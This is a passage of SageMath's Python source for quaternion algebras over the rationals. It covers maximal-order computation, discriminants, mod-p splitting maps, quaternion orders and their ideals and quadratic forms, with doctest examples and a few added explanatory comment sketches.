Order of Quaternion Algebra (-22, 210) with base ring Rational Field with basis (1, i, 1/2*i + 1/2*j, 1/2 + 17/22*i + 1/44*k)
sage: for d in ( m for m in range(1, 750) if is_squarefree(m) ): # long time (3s)
....: A = QuaternionAlgebra(d)
....: R = A.maximal_order(take_shortcuts=False)
....: assert A.discriminant() == R.discriminant()
We don't support number fields other than the rationals yet::
sage: K = QuadraticField(5)
sage: QuaternionAlgebra(K,-1,-1).maximal_order()
Traceback (most recent call last):
...
NotImplementedError: maximal order only implemented for rational quaternion algebras
REFERENCES:
.. [Piz1980] \A. Pizer. An Algorithm for Computing Modular Forms
on `\Gamma_0(N)`, J. Algebra 64 (1980), 340-390.
.. [Voi2012] \J. Voight. Identifying the matrix ring: algorithms
for quaternion algebras and quadratic forms, to appear.
"""
try: return self.__maximal_order
except AttributeError: pass
if self.base_ring() != QQ:
raise NotImplementedError("maximal order only implemented for rational quaternion algebras")
d_A = self.discriminant()
# The following only works over QQ if the discriminant is prime
# and if the invariants are of the special form
# (every quaternion algebra of prime discriminant has a representation
# of such a form though)
a, b = self.invariants()
if take_shortcuts and d_A.is_prime() and a in ZZ and b in ZZ:
a = ZZ(a)
b = ZZ(b)
i,j,k = self.gens()
# if necessary, try to swap invariants to match Pizer's paper
if (a != -1 and b == -1) or (b == -2) \
or (a != -1 and a != -2 and (-a) % 8 != 1):
a, b = b, a
i, j = j, i
k = i*j
basis = []
if (a,b) == (-1,-1):
basis = [(1+i+j+k)/2, i, j, k]
elif a == -1 and (-b).is_prime() and ((-b) % 4 == 3):
basis = [(1+j)/2, (i+k)/2, j, k]
elif a == -2 and (-b).is_prime() and ((-b) % 8 == 5):
basis = [(1+j+k)/2, (i+2*j+k)/4, j, k]
elif (-a).is_prime() and (-b).is_prime():
q = -b
p = -a
if q % 4 == 3 and kronecker_symbol(p,q) == -1:
a = 0
while (a*a*p + 1)%q != 0:
a += 1
basis = [(1+j)/2, (i+k)/2, -(j+a*k)/q, k]
if basis:
self.__maximal_order = self.quaternion_order(basis)
return self.__maximal_order
# The following code should always work (over QQ)
# Start with <1,i,j,k>
R = self.quaternion_order([1] + self.gens())
d_R = R.discriminant()
e_new_gens = []
# For each prime at which R is not yet maximal, make it bigger
for (p,p_val) in d_R.factor():
e = R.basis()
while self.quaternion_order(e).discriminant().valuation(p) > d_A.valuation(p):
# Compute a normalized basis at p
f = normalize_basis_at_p(list(e), p)
# Ensure the basis lies in R by clearing denominators
# (this may make the order smaller at q != p)
# Also saturate the basis (divide out p as far as possible)
V = self.base_ring()**4
A = matrix(self.base_ring(), 4, 4, [ list(g) for g in e ]);
e_n = []
x_rows = A.solve_left(matrix([ V(vec.coefficient_tuple()) for (vec,val) in f ]), check=False).rows()
denoms = [ x.denominator() for x in x_rows ]
for i in range(4):
vec = f[i][0]
val = f[i][1]
v = (val/2).floor()
e_n.append(denoms[i] / p**(v) * vec)
# for e_n to become p-saturated we still need to sort by
# ascending valuation of the quadratic form
lst = sorted(zip(e_n, [f[m][1].mod(2) for m in range(4)]),
key = itemgetter(1))
e_n = list(zip(*lst)[0])
# Final step: Enlarge the basis at p
if p != 2:
# ensure that v_p(e_n[1]**2) = 0 by swapping basis elements
if ZZ(e_n[1]**2).valuation(p) != 0:
if ZZ(e_n[2]**2).valuation(p) == 0:
e_n[1], e_n[2] = e_n[2], e_n[1]
else:
e_n[1], e_n[3] = e_n[3], e_n[1]
a = ZZ(e_n[1]**2)
b = ZZ(e_n[2]**2)
if b.valuation(p) > 0: # if v_p(b) = 0, then already p-maximal
F = ZZ.quo(p)
if F(a).is_square():
x = F(a).sqrt().lift()
if (x**2 - a).mod(p**2) == 0: # make sure v_p(x**2 - a) = 1
x = x + p
g = 1/p*(x - e_n[1])*e_n[2]
e_n[2] = g
e_n[3] = e_n[1]*g
else: # p == 2
t = e_n[1].reduced_trace()
a = -e_n[1].reduced_norm()
b = ZZ(e_n[2]**2)
if t.valuation(p) == 0:
if b.valuation(p) > 0:
x = a
if (x**2 - t*x + a).mod(p**2) == 0: # make sure v_p(...) = 1
x = x + p
g = 1/p*(x - e_n[1])*e_n[2]
e_n[2] = g
e_n[3] = e_n[1]*g
else: # t.valuation(p) > 0
(y,z,w) = maxord_solve_aux_eq(a, b, p)
g = 1/p*(1 + y*e_n[1] + z*e_n[2] + w*e_n[1]*e_n[2])
h = (z*b)*e_n[1] - (y*a)*e_n[2]
e_n[1:4] = [g,h,g*h]
if (1 - a*y**2 - b*z**2 + a*b*w**2).valuation(2) > 2:
e_n = basis_for_quaternion_lattice(list(e) + e_n[1:], reverse=True)
# e_n now contains elements that locally at p give a bigger order,
# but the basis may be messed up at other primes (it might not even
# be an order). We will join them all together at the end
e = e_n
e_new_gens.extend(e[1:])
e_new = basis_for_quaternion_lattice(list(R.basis()) + e_new_gens, reverse=True)
self.__maximal_order = self.quaternion_order(e_new)
return self.__maximal_order
def invariants(self):
"""
Return the structural invariants `a`, `b` of this quaternion
algebra: ``self`` is generated by `i`, `j` subject to
`i^2 = a`, `j^2 = b` and `j*i = -i*j`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(15)
sage: Q.invariants()
(-3, 5)
sage: i^2
-3
sage: j^2
5
"""
return self._a, self._b
def __cmp__(self, other):
"""
Compare self and other.
EXAMPLES::
sage: cmp(QuaternionAlgebra(-1,-7), QuaternionAlgebra(-1,-7))
0
sage: cmp(QuaternionAlgebra(-1,-7), QuaternionAlgebra(-1,-5))
-1
sage: cmp(QuaternionAlgebra(-1,-7), QuaternionAlgebra(-1,-10))
1
"""
if not isinstance(other, QuaternionAlgebra_abstract):
return cmp(type(self), type(other))
c = cmp(self.base_ring(), other.base_ring())
if c: return c
return cmp((self._a, self._b), (other._a, other._b))
def gen(self, i=0):
"""
Return the `i^{th}` generator of ``self``.
INPUT:
- ``i`` - integer (optional, default 0)
EXAMPLES::
sage: Q.<ii,jj,kk> = QuaternionAlgebra(QQ,-1,-2); Q
Quaternion Algebra (-1, -2) with base ring Rational Field
sage: Q.gen(0)
ii
sage: Q.gen(1)
jj
sage: Q.gen(2)
kk
sage: Q.gens()
[ii, jj, kk]
"""
return self._gens[i]
def _repr_(self):
"""
Print representation.
TESTS::
sage: Q.<i,j,k> = QuaternionAlgebra(QQ,-5,-2)
sage: type(Q)
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionAlgebra_ab'>
sage: Q._repr_()
'Quaternion Algebra (-5, -2) with base ring Rational Field'
sage: Q
Quaternion Algebra (-5, -2) with base ring Rational Field
sage: print(Q)
Quaternion Algebra (-5, -2) with base ring Rational Field
sage: str(Q)
'Quaternion Algebra (-5, -2) with base ring Rational Field'
"""
return "Quaternion Algebra (%r, %r) with base ring %s"%(self._a, self._b, self.base_ring())
def inner_product_matrix(self):
"""
Return the inner product matrix associated to ``self``, i.e. the
Gram matrix of the reduced norm as a quadratic form on ``self``.
The standard basis `1`, `i`, `j`, `k` is orthogonal for the reduced norm, so this
matrix is the diagonal matrix with diagonal entries `2`, `-2a`, `-2b`, `2ab`.
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-5,-19)
sage: Q.inner_product_matrix()
[ 2 0 0 0]
[ 0 10 0 0]
[ 0 0 38 0]
[ 0 0 0 190]
sage: R.<a,b> = QQ[]; Q.<i,j,k> = QuaternionAlgebra(Frac(R),a,b)
sage: Q.inner_product_matrix()
[ 2 0 0 0]
[ 0 -2*a 0 0]
[ 0 0 -2*b 0]
[ 0 0 0 2*a*b]
"""
a, b = self._a, self._b
return diagonal_matrix(self.base_ring(), [2, -2*a, -2*b, 2*a*b])
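# Editor's sketch (not in the original source): the matrix above is the Gram
# matrix of the reduced norm N(x0 + x1*i + x2*j + x3*k) = x0^2 - a*x1^2 -
# b*x2^2 + a*b*x3^2, i.e. twice the diagonal of the form's coefficients:
#
#     Q = QuaternionAlgebra(-5, -19)
#     a, b = Q.invariants()
#     assert Q.inner_product_matrix() == diagonal_matrix(QQ, [2, -2*a, -2*b, 2*a*b])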
def discriminant(self):
"""
Given a quaternion algebra `A` defined over a number field,
return the discriminant of `A`, i.e. the
product of the ramified primes of `A`.
EXAMPLES::
sage: QuaternionAlgebra(210,-22).discriminant()
210
sage: QuaternionAlgebra(19).discriminant()
19
sage: F.<a> = NumberField(x^2-x-1)
sage: B.<i,j,k> = QuaternionAlgebra(F, 2*a,F(-1))
sage: B.discriminant()
Fractional ideal (2)
sage: QuaternionAlgebra(QQ[sqrt(2)],3,19).discriminant()
Fractional ideal (1)
"""
try:
return self.__discriminant
except AttributeError:
pass
if not is_RationalField(self.base_ring()):
try:
F = self.base_ring()
self.__discriminant = F.hilbert_conductor(self._a, self._b)
except NotImplementedError:
raise ValueError("base field must be rational numbers or number field")
else:
self.__discriminant = hilbert_conductor(self._a, self._b)
return self.__discriminant
def ramified_primes(self):
"""
Return the primes that ramify in this quaternion algebra. Currently
only implemented over the rational numbers.
EXAMPLES::
sage: QuaternionAlgebra(QQ, -1, -1).ramified_primes()
[2]
"""
#TODO: more examples
return [f[0] for f in factor(self.discriminant())]
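# Editor's sketch (not in the original source): over QQ the discriminant is
# by definition the product of the ramified primes, so the two methods can
# be cross-checked against each other:
#
#     B = QuaternionAlgebra(210, -22)
#     d = ZZ(1)
#     for p in B.ramified_primes():
#         d *= p
#     assert d == B.discriminant()    # 210, as in the doctest above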
def _magma_init_(self, magma):
"""
Return Magma version of this quaternion algebra.
EXAMPLES::
sage: Q = QuaternionAlgebra(-1,-1); Q
Quaternion Algebra (-1, -1) with base ring Rational Field
sage: Q._magma_init_(magma) # optional - magma
'QuaternionAlgebra(_sage_[...],-1/1,-1/1)'
sage: A = magma(Q); A # optional - magma
Quaternion Algebra with base ring Rational Field, defined by i^2 = -1, j^2 = -1
sage: A.RamifiedPlaces() # optional - magma
[
Ideal of Integer Ring generated by 2
]
A more complicated example involving a quaternion algebra over a number field::
sage: K.<a> = QQ[sqrt(2)]; Q = QuaternionAlgebra(K,-1,a); Q
Quaternion Algebra (-1, sqrt2) with base ring Number Field in sqrt2 with defining polynomial x^2 - 2
sage: magma(Q) # optional - magma
Quaternion Algebra with base ring Number Field with defining polynomial x^2 - 2 over the Rational Field, defined by i^2 = -1, j^2 = sqrt2
sage: Q._magma_init_(magma) # optional - magma
'QuaternionAlgebra(_sage_[...],(_sage_[...]![-1, 0]),(_sage_[...]![0, 1]))'
"""
R = magma(self.base_ring())
return 'QuaternionAlgebra(%s,%s,%s)'%(R.name(),
self._a._magma_init_(magma),
self._b._magma_init_(magma))
def quaternion_order(self, basis, check=True):
"""
Return the order in this quaternion algebra with the given basis.
INPUT:
- ``basis`` - list of 4 elements of ``self``
- ``check`` - bool (default: ``True``)
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-11,-1)
sage: Q.quaternion_order([1,i,j,k])
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1, i, j, k)
We test out ``check=False``::
sage: Q.quaternion_order([1,i,j,k], check=False)
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis [1, i, j, k]
sage: Q.quaternion_order([i,j,k], check=False)
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis [i, j, k]
"""
return QuaternionOrder(self, basis, check=check)
def ideal(self, gens, left_order=None, right_order=None, check=True, **kwds):
r"""
Return the quaternion ideal with given gens over `\ZZ`.
Neither a left nor a right order structure need be specified.
INPUT:
- ``gens`` -- a list of elements of this quaternion order
- ``check`` -- bool (default: ``True``); if ``False``, then ``gens`` must be a
4-tuple that forms a Hermite basis for an ideal
- ``left_order`` -- a quaternion order or ``None``
- ``right_order`` -- a quaternion order or ``None``
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1)
sage: R.ideal([2*a for a in R.basis()])
Fractional ideal (2, 2*i, 2*j, 2*k)
"""
if self.base_ring() == QQ:
return QuaternionFractionalIdeal_rational(gens, left_order=left_order, right_order=right_order, check=check)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
@cached_method
def modp_splitting_data(self, p):
r"""
Return mod `p` splitting data for this quaternion algebra at
the unramified prime `p`. This is `2\times 2`
matrices `I`, `J`, `K` over the finite field `\GF{p}` such that if
the quaternion algebra has generators `i, j, k`, then `I^2 =
i^2`, `J^2 = j^2`, `IJ=K` and `IJ=-JI`.
.. NOTE::
Currently only implemented when `p` is odd and the base
ring is `\QQ`.
INPUT:
- `p` -- unramified odd prime
OUTPUT:
- 2-tuple of matrices over finite field
EXAMPLES::
sage: Q = QuaternionAlgebra(-15, -19)
sage: Q.modp_splitting_data(7)
(
[0 6] [6 1] [6 6]
[1 0], [1 1], [6 1]
)
sage: Q.modp_splitting_data(next_prime(10^5))
(
[ 0 99988] [97311 4] [99999 59623]
[ 1 0], [13334 2692], [97311 4]
)
sage: I,J,K = Q.modp_splitting_data(23)
sage: I
[0 8]
[1 0]
sage: I^2
[8 0]
[0 8]
sage: J
[19 2]
[17 4]
sage: J^2
[4 0]
[0 4]
sage: I*J == -J*I
True
sage: I*J == K
True
The following is a good test because of the asserts in the code::
sage: v = [Q.modp_splitting_data(p) for p in primes(20,1000)]
Proper error handling::
sage: Q.modp_splitting_data(5)
Traceback (most recent call last):
...
NotImplementedError: algorithm for computing local splittings not implemented in general (currently require the first invariant to be coprime to p)
sage: Q.modp_splitting_data(2)
Traceback (most recent call last):
...
NotImplementedError: p must be odd
"""
if self.base_ring() != QQ:
raise NotImplementedError("must be rational quaternion algebra")
p = ZZ(p)
if not p.is_prime():
raise ValueError("p (=%s) must be prime"%p)
if p == 2:
raise NotImplementedError("p must be odd")
if self.discriminant() % p == 0:
raise ValueError("p (=%s) must be an unramified prime"%p)
i, j, k = self.gens()
F = GF(p)
i2 = F(i*i)
j2 = F(j*j)
M = MatrixSpace(F, 2)
I = M([0,i2,1,0])
if i2 == 0:
raise NotImplementedError("algorithm for computing local splittings not implemented in general (currently require the first invariant to be coprime to p)")
i2inv = 1/i2
a = None
for b in list(F):
if not b: continue
c = j2 + i2inv * b*b
if c.is_square():
a = -c.sqrt()
break
if a is None:
# do a fallback search, maybe needed in char 3 sometimes.
for J in M:
K = I*J
if J*J == j2 and K == -J*I:
return I, J, K
J = M([a,b,(j2-a*a)/b, -a])
K = I*J
assert K == -J*I, "bug in that I,J don't skew commute"
return I, J, K
def modp_splitting_map(self, p):
r"""
Return a Python map from the (`p`-integral) quaternion algebra to
the set of `2\times 2` matrices over `\GF{p}`.
INPUT:
- `p` -- prime number
EXAMPLES::
sage: Q.<i,j,k> = QuaternionAlgebra(-1, -7)
sage: f = Q.modp_splitting_map(13)
sage: a = 2+i-j+3*k; b = 7+2*i-4*j+k
sage: f(a*b)
[12 3]
[10 5]
sage: f(a)*f(b)
[12 3]
[10 5]
"""
I, J, K = self.modp_splitting_data(p)
F = I.base_ring()
def phi(q):
v = [F(a) for a in q.coefficient_tuple()]
return v[0] + I*v[1] + J*v[2] + K*v[3]
return phi
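# Editor's sketch (not in the original source): phi is a ring homomorphism
# modulo p, so it respects both sums and products; spot-check, following the
# doctest above:
#
#     Q = QuaternionAlgebra(-1, -7)
#     i, j, k = Q.gens()
#     f = Q.modp_splitting_map(13)
#     x = 2 + i - j + 3*k; y = 7 + 2*i - 4*j + k
#     assert f(x*y) == f(x)*f(y) and f(x + y) == f(x) + f(y)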
############################################################
# Unpickling
############################################################
def unpickle_QuaternionAlgebra_v0(*key):
"""
The 0th version of pickling for quaternion algebras.
EXAMPLES::
sage: Q = QuaternionAlgebra(-5,-19)
sage: t = (QQ, -5, -19, ('i', 'j', 'k'))
sage: sage.algebras.quatalg.quaternion_algebra.unpickle_QuaternionAlgebra_v0(*t)
Quaternion Algebra (-5, -19) with base ring Rational Field
sage: loads(dumps(Q)) == Q
True
sage: loads(dumps(Q)) is Q
True
"""
return QuaternionAlgebra(*key)
class QuaternionOrder(Algebra):
"""
An order in a quaternion algebra.
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order()
Order of Quaternion Algebra (-1, -7) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
sage: type(QuaternionAlgebra(-1,-7).maximal_order())
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionOrder'>
"""
def __init__(self, A, basis, check=True):
"""
INPUT:
- ``A`` - a quaternion algebra
- ``basis`` - list of 4 integral quaternions in ``A``
- ``check`` - whether to do type and other consistency checks
.. WARNING::
Currently most methods silently assume that the ``A.base_ring()``
is ``QQ``.
EXAMPLES::
sage: A.<i,j,k> = QuaternionAlgebra(-3,-5)
sage: sage.algebras.quatalg.quaternion_algebra.QuaternionOrder(A, [1,i,j,k])
Order of Quaternion Algebra (-3, -5) with base ring Rational Field with basis (1, i, j, k)
sage: R = sage.algebras.quatalg.quaternion_algebra.QuaternionOrder(A, [1,2*i,2*j,2*k]); R
Order of Quaternion Algebra (-3, -5) with base ring Rational Field with basis (1, 2*i, 2*j, 2*k)
sage: type(R)
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionOrder'>
Over QQ and number fields it is checked whether the given
basis actually gives an order (as a module over the maximal order)::
sage: A.<i,j,k> = QuaternionAlgebra(-1,-1)
sage: A.quaternion_order([1,i,j,i-j])
Traceback (most recent call last):
...
ValueError: basis must have rank 4
sage: A.quaternion_order([2,i,j,k])
Traceback (most recent call last):
...
ValueError: lattice must contain 1
sage: A.quaternion_order([1,i/2,j/2,k/2])
Traceback (most recent call last):
...
ValueError: given lattice must be a ring
sage: K = QuadraticField(10)
sage: A.<i,j,k> = QuaternionAlgebra(K,-1,-1)
sage: A.quaternion_order([1,i,j,k])
Order of Quaternion Algebra (-1, -1) with base ring Number Field in a with defining polynomial x^2 - 10 with basis (1, i, j, k)
sage: A.quaternion_order([1,i/2,j,k])
Traceback (most recent call last):
...
ValueError: given lattice must be a ring
"""
if check:
# right data type
if not isinstance(basis, (list, tuple)):
raise TypeError("basis must be a list or tuple")
# right length
if len(basis) != 4:
raise ValueError("basis must have length 4")
# coerce to common parent
basis = tuple([A(x) for x in basis])
# has rank 4
V = A.base_ring()**4
if V.span([ V(x.coefficient_tuple()) for x in basis]).dimension() != 4:
raise ValueError("basis must have rank 4")
# The additional checks will work over QQ and over number fields,
# but we can't actually do much with an order defined over a number
# field
if A.base_ring() == QQ: # fast code over QQ
M = matrix(QQ, 4, 4, [ x.coefficient_tuple() for x in basis])
v = M.solve_left(V([1,0,0,0]))
if v.denominator() != 1:
raise ValueError("lattice must contain 1")
# check if multiplicatively closed
M1 = basis_for_quaternion_lattice(basis)
M2 = basis_for_quaternion_lattice(list(basis) + [ x*y for x in basis for y in basis])
if M1 != M2:
raise ValueError("given lattice must be a ring")
if A.base_ring() != QQ: # slow code over number fields (should eventually use PARI's nfhnf)
O = None
try:
O = A.base_ring().maximal_order()
except AttributeError:
pass
if O:
M = matrix(A.base_ring(), 4, 4, [ x.coefficient_tuple() for x in basis])
v = M.solve_left(V([1,0,0,0]))
if any([ not a in O for a in v]):
raise ValueError("lattice must contain 1")
# check if multiplicatively closed
Y = matrix(QQ, 16, 4, [ (x*y).coefficient_tuple() for x in basis for y in basis])
X = M.solve_left(Y)
if any([ not a in O for x in X for a in x ]):
raise ValueError("given lattice must be a ring")
self.__basis = basis
self.__quaternion_algebra = A
ParentWithGens.__init__(self, ZZ, names=None)
def gens(self):
"""
Return generators for self.
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order().gens()
(1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
"""
return self.__basis
def ngens(self):
"""
Return the number of generators (which is 4).
EXAMPLES::
sage: QuaternionAlgebra(-1,-7).maximal_order().ngens()
4
"""
return 4
def gen(self, n):
"""
Return the n-th generator.
INPUT:
- ``n`` - an integer between 0 and 3, inclusive.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order(); R
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
sage: R.gen(0)
1/2 + 1/2*i
sage: R.gen(1)
1/2*j - 1/2*k
sage: R.gen(2)
i
sage: R.gen(3)
-k
"""
return self.__basis[n]
def __cmp__(self, R):
"""
Compare orders self and other. Two orders are equal if they
have the same basis and are in the same quaternion algebra.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R == R # indirect doctest
True
sage: R == QuaternionAlgebra(-1,-1).maximal_order()
False
sage: R==5
False
"""
if not isinstance(R, QuaternionOrder):
return cmp(type(self), type(R))
c = cmp(self.__quaternion_algebra, R.__quaternion_algebra)
if c: return c
return cmp(self.__basis, R.__basis)
def basis(self):
"""
Return the fixed choice of basis for this quaternion order.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return self.__basis
def quaternion_algebra(self):
"""
Return ambient quaternion algebra that contains this quaternion order.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().quaternion_algebra()
Quaternion Algebra (-11, -1) with base ring Rational Field
"""
return self.__quaternion_algebra
def _repr_(self):
"""
Return string representation of this order.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order()._repr_()
'Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)'
sage: QuaternionAlgebra(-11,-1).maximal_order()
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return 'Order of %s with basis %s'%(self.quaternion_algebra(), self.basis())
def random_element(self, *args, **kwds):
"""
Return a random element of this order.
The args and kwds are passed to the random_element method of
the integer ring, and we return an element of the form
.. math::
ae_1 + be_2 + ce_3 + de_4
where `e_1`, ..., `e_4` are the basis of this order and `a`,
`b`, `c`, `d` are random integers.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().random_element()
-4 - 4*i + j - k
sage: QuaternionAlgebra(-11,-1).maximal_order().random_element(-10,10)
-9/2 - 7/2*i - 7/2*j - 3/2*k
"""
return sum( (ZZ.random_element(*args, **kwds) * b for b in self.basis()) )
def intersection(self, other):
"""
Return the intersection of this order with other.
INPUT:
- ``other`` - a quaternion order in the same ambient quaternion algebra
OUTPUT: a quaternion order
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.intersection(R)
Order of Quaternion Algebra (-11, -1) with base ring Rational Field with basis (1/2 + 1/2*i, i, 1/2*j + 1/2*k, k)
We intersect various orders in the quaternion algebra ramified at 11::
sage: B = BrandtModule(11,3)
sage: R = B.maximal_order(); S = B.order_of_level_N()
sage: R.intersection(S)
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 5/2*k, j, 3*k)
sage: R.intersection(S) == S
True
sage: B = BrandtModule(11,5)
sage: T = B.order_of_level_N()
sage: S.intersection(T)
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 23/2*k, j, 15*k)
"""
if not isinstance(other, QuaternionOrder):
raise TypeError("other must be a QuaternionOrder")
A = self.quaternion_algebra()
if other.quaternion_algebra() != A:
raise ValueError("self and other must be in the same ambient quaternion algebra")
V = A.base_ring()**4
B = V.span([V(list(g)) for g in self.basis()], ZZ)
C = V.span([V(list(g)) for g in other.basis()], ZZ)
# todo -- A(list(e)) could be A(e)
return QuaternionOrder(A, [A(list(e)) for e in B.intersection(C).basis()])
def free_module(self):
r"""
Return the free `\ZZ`-module that corresponds to this order
inside the vector space corresponding to the ambient
quaternion algebra.
OUTPUT:
A free `\ZZ`-module of rank 4.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
sage: R.free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[1/2 1/2 0 0]
[ 0 1 0 0]
[ 0 0 1/2 1/2]
[ 0 0 0 1]
"""
try: return self.__free_module
except AttributeError: pass
V = self.quaternion_algebra().base_ring()**4
M = V.span([V(list(g)) for g in self.basis()], ZZ)
self.__free_module = M
return M
def discriminant(self):
r"""
Return the discriminant of this order, which we define as
`\sqrt{ det ( Tr(e_i \bar{e}_j ) ) }`, where `\{e_i\}` is the
basis of the order.
OUTPUT: rational number
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().discriminant()
11
sage: S = BrandtModule(11,5).order_of_level_N()
sage: S.discriminant()
55
sage: type(S.discriminant())
<type 'sage.rings.rational.Rational'>
"""
L = []
for d in self.basis():
MM = []
for e in self.basis():
MM.append( (d * e.conjugate()).reduced_trace() )
L.append(MM)
return (MatrixSpace(QQ, 4, 4)(L)).determinant().sqrt()
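# Editor's sketch (not in the original source): for a maximal order this
# reduced discriminant agrees with the discriminant of the ambient algebra,
# the product of its ramified primes:
#
#     O = QuaternionAlgebra(-11, -1).maximal_order()
#     assert O.discriminant() == O.quaternion_algebra().discriminant()  # 11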
def left_ideal(self, gens, check=True):
r"""
Return the ideal with given gens over `\ZZ`.
INPUT:
- ``gens`` -- a list of elements of this quaternion order
- ``check`` -- bool (default: ``True``); if ``False``, then ``gens`` must
4-tuple that forms a Hermite basis for an ideal
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.left_ideal([2*a for a in R.basis()])
Fractional ideal (1 + i, 2*i, j + k, 2*k)
"""
if self.base_ring() == ZZ:
return QuaternionFractionalIdeal_rational(gens, left_order=self, check=check)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
def right_ideal(self, gens, check=True):
r"""
Return the ideal with given gens over `\ZZ`.
INPUT:
- ``gens`` -- a list of elements of this quaternion order
- ``check`` -- bool (default: ``True``); if ``False``, then ``gens`` must
4-tuple that forms a Hermite basis for an ideal
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.right_ideal([2*a for a in R.basis()])
Fractional ideal (1 + i, 2*i, j + k, 2*k)
"""
if self.base_ring() == ZZ:
return QuaternionFractionalIdeal_rational(gens, right_order=self, check=check)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
def unit_ideal(self):
"""
Return the unit ideal in this quaternion order.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: I = R.unit_ideal(); I
Fractional ideal (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
if self.base_ring() == ZZ:
return QuaternionFractionalIdeal_rational(self.basis(), left_order=self, right_order=self, check=False)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
def quadratic_form(self):
"""
Return the normalized quadratic form associated to this quaternion order.
OUTPUT: quadratic form
EXAMPLES::
sage: R = BrandtModule(11,13).order_of_level_N()
sage: Q = R.quadratic_form(); Q
Quadratic form in 4 variables over Rational Field with coefficients:
[ 14 253 55 286 ]
[ * 1455 506 3289 ]
[ * * 55 572 ]
[ * * * 1859 ]
sage: Q.theta_series(10)
1 + 2*q + 2*q^4 + 4*q^6 + 4*q^8 + 2*q^9 + O(q^10)
"""
return self.unit_ideal().quadratic_form()
def ternary_quadratic_form(self, include_basis=False):
"""
Return the ternary quadratic form associated to this order.
INPUT:
- ``include_basis`` -- bool (default: False), if True also
return a basis for the dimension 3 subspace `G`
OUTPUT:
- QuadraticForm
- optional basis for dimension 3 subspace
This function computes the positive definite quadratic form
obtained by letting `G` be the trace-zero subspace of `\ZZ` +
2* ``self``, which has rank 3, and restricting the pairing::
(x,y) = (x.conjugate()*y).reduced_trace()
to `G`.
APPLICATIONS: Ternary quadratic forms associated to an order
in a rational quaternion algebra are useful in computing with
Gross points, in deciding whether quaternion orders have
embeddings from orders in quadratic imaginary fields, and in
computing elements of the Kohnen plus subspace of modular
forms of weight 3/2.
EXAMPLES::
sage: R = BrandtModule(11,13).order_of_level_N()
sage: Q = R.ternary_quadratic_form(); Q
Quadratic form in 3 variables over Rational Field with coefficients:
[ 5820 1012 13156 ]
[ * 55 1144 ]
[ * * 7436 ]
sage: factor(Q.disc())
2^4 * 11^2 * 13^2
The following theta series is a modular form of weight 3/2 and level 4*11*13::
sage: Q.theta_series(100)
1 + 2*q^23 + 2*q^55 + 2*q^56 + 2*q^75 + 4*q^92 + O(q^100)
"""
if self.base_ring() != ZZ:
raise NotImplementedError("ternary quadratic form of order only implemented for quaternion algebras over QQ")
Q = self.quaternion_algebra()
# 2*R + ZZ
twoR = self.free_module().scale(2)
A = twoR.ambient_module()
Z = twoR.span( [Q(1).coefficient_tuple()], ZZ)
S = twoR + Z
# Now we intersect with the trace 0 submodule
v = [b.reduced_trace() for b in Q.basis()]
M = matrix(QQ,4,1,v)
tr0 = M.kernel()
G = tr0.intersection(S)
B = [Q(a) for a in G.basis()]
m = matrix(QQ,[[x.pair(y) for x in B] for y in B])
from sage.quadratic_forms.quadratic_form import QuadraticForm
Q = QuadraticForm(m)
if include_basis:
return Q, B
else:
return Q
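# Editor's sketch (not in the original source): the trace-zero subspace of
# ZZ + 2*R has rank 3, so the form above is genuinely ternary. ``BrandtModule``
# is a Sage global, not defined in this file:
#
#     R = BrandtModule(11, 13).order_of_level_N()
#     T = R.ternary_quadratic_form()
#     assert T.dim() == 3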
class QuaternionFractionalIdeal(Ideal_fractional):
def __hash__(self):
r"""
Constant hash function: every fractional ideal hashes to 0.
TESTS::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: hash(R.right_ideal(R.basis()))
0
"""
return 0
class QuaternionFractionalIdeal_rational(QuaternionFractionalIdeal):
"""
A fractional ideal in a rational quaternion algebra.
INPUT:
- ``left_order`` -- a quaternion order or ``None``
- ``right_order`` -- a quaternion order or ``None``
